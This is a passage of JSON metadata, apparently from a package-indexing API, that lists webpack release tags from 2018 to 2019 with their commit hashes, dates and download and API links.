parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/